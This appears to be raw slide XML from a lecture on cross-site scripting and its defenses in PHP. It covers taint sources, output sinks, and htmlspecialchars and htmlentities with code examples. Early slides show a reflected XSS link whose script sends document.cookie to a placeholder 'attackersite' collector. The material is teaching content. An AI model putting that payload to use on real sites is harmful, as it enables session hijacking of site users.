              <a:off x="4184672" y="4543208"/>
              <a:ext cx="3858339" cy="1678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/>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>6</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en-US" altLang="zh-TW" b="1" dirty="0">
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>.</a:t>
              </a:r>
              <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-TW" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr lvl="1"/>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0">
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>&lt;HTML&gt;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr lvl="1"/>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0">
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>&lt;Title&gt;Welcome!&lt;/Title&gt;Hi </a:t>
              </a:r>
              <a:r>
                <a:rPr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&lt;script&gt;</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>window.open</a:t>
              </a:r>
              <a:r>
                <a:rPr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(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‘</a:t>
              </a:r>
              <a:r>
                <a:rPr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http://attackersite/collect.cgi?cookie</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0"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 =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’</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0"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+</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en-US" altLang="zh-TW" sz="1400" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>document.cookie</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0"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);</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr lvl="1"/>
              <a:r>
                <a:rPr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&lt;/script&gt;</a:t>
              </a:r>
              <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-TW" sz="1400" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="30" name="Line 18"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4604640" y="4500570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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="31" name="直線接點 30"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="2343774" y="3929066"/>
            <a:ext cx="4429156" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="47625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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="23" name="群組 31"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="993191" y="3051501"/>
            <a:ext cx="3507372" cy="1493136"/>
            <a:chOff x="993190" y="3323425"/>
            <a:chExt cx="7079272" cy="1094180"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="33" name="Text Box 11"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1071538" y="3357563"/>
              <a:ext cx="6929485" cy="1060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/>
              <a:r>
                <a:rPr kumimoji="0" lang="en-US" altLang="zh-TW" b="1" dirty="0">
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>4. </a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr marL="0" lvl="1"/>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0">
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>&lt;HTML&gt;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr kumimoji="0" lang="en-US" altLang="zh-TW" sz="1400" dirty="0">
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>&lt;a </a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en-US" altLang="zh-TW" sz="1400" dirty="0" err="1">
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>href</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en-US" altLang="zh-TW" sz="1400" dirty="0">
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>=‘http://</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0">
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>v</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en-US" altLang="zh-TW" sz="1400" dirty="0">
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>ulnerablesite/welcome.cgi? name=</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0"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&lt;script&gt;window.open(%27</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0"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http://</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr kumimoji="0" lang="en-US" altLang="zh-TW" sz="1400" u="sng" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="0000FF"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>attackersite</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0"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/</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en-US" altLang="zh-TW" sz="1400" u="sng" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="0000FF"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>collect.cgi?cookie</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0"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=</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0"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%27%2Bdocument.cookie);&lt;/script&gt;</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en-US" altLang="zh-TW" sz="1400" dirty="0">
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>’&gt;</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en-US" altLang="zh-TW" sz="1400" dirty="0" err="1">
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>vulnerablesite</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en-US" altLang="zh-TW" sz="1400" dirty="0">
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>&lt;/a&gt;</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="34" name="Line 17"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="993190" y="3323425"/>
              <a:ext cx="7079272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28" name="群組 34"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4609233" y="3098054"/>
            <a:ext cx="3507372" cy="1615703"/>
            <a:chOff x="993190" y="3143248"/>
            <a:chExt cx="7079272" cy="1183998"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="36" name="矩形 35"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4429124" y="3143248"/>
              <a:ext cx="285752" cy="200666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noFill/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grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="32" name="群組 38"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="993190" y="3233067"/>
              <a:ext cx="7079272" cy="1094179"/>
              <a:chOff x="993190" y="3323425"/>
              <a:chExt cx="7079272" cy="1094179"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="38" name="Text Box 11"/>
              <p:cNvSpPr txBox="1">
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1071538" y="3357562"/>
                <a:ext cx="6929485" cy="10600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1"/>
                <a:r>
                  <a:rPr kumimoji="0" lang="en-US" altLang="zh-TW" b="1" dirty="0">
                    <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                  </a:rPr>
                  <a:t>5. </a:t>
                </a:r>
                <a:endParaRPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:endParaRPr>
              </a:p>
              <a:p>
                <a:pPr marL="0" lvl="1"/>
                <a:r>
                  <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0">
                    <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                  </a:rPr>
                  <a:t>&lt;HTML&gt;</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr kumimoji="0" lang="en-US" altLang="zh-TW" sz="1400" dirty="0">
                    <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                  </a:rPr>
                  <a:t>&lt;a </a:t>
                </a:r>
                <a:r>
                  <a:rPr kumimoji="0" lang="en-US" altLang="zh-TW" sz="1400" dirty="0" err="1">
                    <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                  </a:rPr>
                  <a:t>href</a:t>
                </a:r>
                <a:r>
                  <a:rPr kumimoji="0" lang="en-US" altLang="zh-TW" sz="1400" dirty="0">
                    <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                  </a:rPr>
                  <a:t>=‘http://</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0">
                    <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                  </a:rPr>
                  <a:t>v</a:t>
                </a:r>
                <a:r>
                  <a:rPr kumimoji="0" lang="en-US" altLang="zh-TW" sz="1400" dirty="0">
                    <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                  </a:rPr>
                  <a:t>ulnerablesite/welcome.cgi? name=</a:t>
                </a:r>
                <a:r>
                  <a:rPr kumimoji="0" lang="en-US" altLang="zh-TW" sz="1400" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="FF0000"/>
                    </a:solidFill>
                    <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                  </a:rPr>
                  <a:t>&lt;script&gt;window.open(%27</a:t>
                </a:r>
                <a:r>
                  <a:rPr kumimoji="0" lang="en-US" altLang="zh-TW" sz="1400" u="sng" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="0000FF"/>
                    </a:solidFill>
                    <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                  </a:rPr>
                  <a:t>http://</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr kumimoji="0" lang="en-US" altLang="zh-TW" sz="1400" u="sng" dirty="0" err="1">
                    <a:solidFill>
                      <a:srgbClr val="0000FF"/>
                    </a:solidFill>
                    <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                  </a:rPr>
                  <a:t>attackersite</a:t>
                </a:r>
                <a:r>
                  <a:rPr kumimoji="0" lang="en-US" altLang="zh-TW" sz="1400" u="sng" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="0000FF"/>
                    </a:solidFill>
                    <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                  </a:rPr>
                  <a:t>/</a:t>
                </a:r>
                <a:r>
                  <a:rPr kumimoji="0" lang="en-US" altLang="zh-TW" sz="1400" u="sng" dirty="0" err="1">
                    <a:solidFill>
                      <a:srgbClr val="0000FF"/>
                    </a:solidFill>
                    <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                  </a:rPr>
                  <a:t>collect.cgi?cookie</a:t>
                </a:r>
                <a:r>
                  <a:rPr kumimoji="0" lang="en-US" altLang="zh-TW" sz="1400" u="sng" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="0000FF"/>
                    </a:solidFill>
                    <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                  </a:rPr>
                  <a:t>=</a:t>
                </a:r>
                <a:r>
                  <a:rPr kumimoji="0" lang="en-US" altLang="zh-TW" sz="1400" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="FF0000"/>
                    </a:solidFill>
                    <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                  </a:rPr>
                  <a:t>%27%2Bdocument.cookie);&lt;/script&gt;</a:t>
                </a:r>
                <a:r>
                  <a:rPr kumimoji="0" lang="en-US" altLang="zh-TW" sz="1400" dirty="0">
                    <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                  </a:rPr>
                  <a:t>’&gt;</a:t>
                </a:r>
                <a:r>
                  <a:rPr kumimoji="0" lang="en-US" altLang="zh-TW" sz="1400" dirty="0" err="1">
                    <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                  </a:rPr>
                  <a:t>vulnerablesite</a:t>
                </a:r>
                <a:r>
                  <a:rPr kumimoji="0" lang="en-US" altLang="zh-TW" sz="1400" dirty="0">
                    <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                  </a:rPr>
                  <a:t>&lt;/a&gt;</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="39" name="Line 17"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="993190" y="3323425"/>
                <a:ext cx="7079272" cy="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>
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40" name="日期版面配置區 3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41" name="投影片編號版面配置區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42" name="頁尾版面配置區 4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Defenses against Cross-Site Scripting in PHP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dirty="0"/>
              <a:t>Sources (assumption: the database is not tainted)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$_GET</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$_POST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t>, $_SERVER, $_COOKIE, $_FILE, $_REQUEST, $_SESSION</a:t>
            </a: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dirty="0"/>
              <a:t>More Sources (assumption: the database is tainted)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" err="1"/>
              <a:t>mysql_fetch_array</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t>(), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" err="1"/>
              <a:t>mysql_fetch_field</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t>(), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" err="1"/>
              <a:t>mysql_fetch_object</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t>(), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" err="1"/>
              <a:t>mysql_fetch_row</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t>(), …</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0"/>
              <a:t>Sinks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>echo, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, …</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0"/>
              <a:t>Defenses </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" err="1"/>
              <a:t>htmlspecialchars</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" err="1"/>
              <a:t>htmlentities</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t>()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Defenses against Cross-Site Scripting (cont.)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Built-in function: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" err="1"/>
              <a:t>htmlspecialchars</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0"/>
              <a:t>( string $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" err="1"/>
              <a:t>str</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" altLang="zh-TW" sz="2600" dirty="0"/>
              <a:t>[, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" altLang="zh-TW" sz="2600" dirty="0" err="1"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" altLang="zh-TW" sz="2600" dirty="0"/>
              <a:t> $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" altLang="zh-TW" sz="2600" dirty="0" err="1"/>
              <a:t>quote_style</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" altLang="zh-TW" sz="2600" dirty="0"/>
              <a:t> = ENT_COMPAT])</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t>Convert special characters to HTML entities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>'&amp;' (ampersand) becomes '&amp;amp;' </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>'"' (double quote) becomes '&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>quot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>;' when </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0"/>
              <a:t>ENT_NOQUOTES</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> is not set. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>''' (single quote) becomes '&amp;#039;' only when </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0"/>
              <a:t>ENT_QUOTES</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> is set. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>'&lt;' (less than) becomes '&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>lt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>;' </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>'&gt;' (greater than) becomes '&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>gt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>;' 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214414" y="5300507"/>
            <a:ext cx="714380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&lt;?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>php</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>$new = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>htmlspecialchars</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>("&lt;a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>='test'&gt;Test&lt;/a&gt;", ENT_QUOTES);</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>echo $new; // &amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>lt;a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>=&amp;#039;test&amp;#039;&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>gt;Test&amp;lt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>a&amp;gt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>?&gt;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Defenses against Cross-Site Scripting (cont.)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Built-in function:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" err="1"/>
              <a:t>htmlentities</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0"/>
              <a:t>( string $string [, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" err="1"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0"/>
              <a:t> $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" err="1"/>
              <a:t>quote_style</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" i="1" dirty="0"/>
              <a:t> = ENT_COMPAT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0"/>
              <a:t>] )</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t>the same effect with built-in function: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" err="1"/>
              <a:t>htmlspecialchars</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p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214414" y="2643184"/>
            <a:ext cx="6572296" cy="20313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&lt;?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>php</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>orig</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> = "I'll \"walk\" the &lt;b&gt;dog&lt;/b&gt; now";</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>$a = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>htmlentities</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>($</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>orig</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>);</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>$b = </a:t>
            </a:r>
            <a:r>
